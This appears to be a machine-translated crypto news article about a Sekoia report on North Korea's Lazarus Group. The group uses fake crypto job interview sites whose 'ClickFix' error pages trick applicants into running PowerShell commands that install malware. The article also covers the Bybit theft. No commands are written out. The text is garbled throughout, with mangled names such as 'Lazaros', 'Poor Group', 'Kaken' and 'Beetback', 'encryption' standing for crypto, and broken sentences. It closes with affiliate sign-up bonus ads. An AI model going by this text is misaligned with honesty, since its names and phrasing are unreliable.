A report on the recent cybersecurity by Sekoia revealed a sophisticated threat represented by the Lazaros Group, the Poor Group associated with North Korea’s notorious. It is now benefiting from a tactic known as “Clickfix” to target job seekers in the cryptocurrency sector, especially in central financing (CEFI).
This approach represents an adaptation of the group’s previous “interview” campaign, which was previously aimed at developers and engineers in artificial intelligence and roles related to encryption.
Lazaros takes advantage of the encryption employment
Recent notice campaignLazarus turned its focus into non -technical professionals, such as marketing and business development employees, by impersonating the major encryption companies such as Coinbase, Kucoin, Kaken, and even Tether Stablecoin.
The attackers build fraudulent websites that mimic jobs for jobs and attract candidates with fake interview invitations. These sites often include realistic application models and even video introductions, which enhances the feeling of legitimacy.
However, when the user tries to record a video, a fabricated error message is displayed, which usually indicates a webcam or a malfunction in the driver. The page then demands the user to run PowerShell orders under the guise of exploring and repairing errors, which leads to downloading malware.
This Clickfix method, although it is relatively new, has become more prevalent due to its psychological simplicity – since users believe they are a technical problem, and not to implement harmful software instructions. According to Sekoia, the campaign depends on 184 fake interviews, indicating at least 14 prominent companies to enhance credibility.
In this way, the latest tactics of the increasing development in social engineering and its ability to exploit the professional ambitions of individuals in the competitive coding market. Interestingly, this shift also indicates that the group is working to expand its targeting criteria by targeting it not only to those who have access to code or infrastructure but also to those who may deal with sensitive internal data or in a position allowing them to facilitate violations inadvertently.
Despite the appearance of Clickfix, Sekoia mentioned that the original infectious interview campaign is still active. This publication parallel to strategies indicates that the group sponsored by the state in North Korea may test its relative effectiveness or sewing tactics to the various targeted population composition. Either way, campaigns share a fixed goal-to provide harmful programs for stealing information through reliable channels and processing victims in self-infection.
Lazaros behind Beetback penetration
FBI officially Attributed The attack of $ 1.5 billion on BYBIT for the Lazaros Group. The infiltrators targeting the exchange of coding have made fake job offers to deceive employees to install polluted trading programs known as “Tradertraitor”.
Although it is made to look authentic by the development of Javascript via platforms, the built -in applications for theft of private keys and the implementation of illegal transactions on Blockchain.
Binance Free $ 600 (exclusive Cryptopotato): Use this link To register a new account and receive an exclusive welcome of $ 600 on Binance ((Full details).
Limited offer for Cryptopotato readers in bybit: Use this link To register and open the position of 500 dollars for free on any currency!
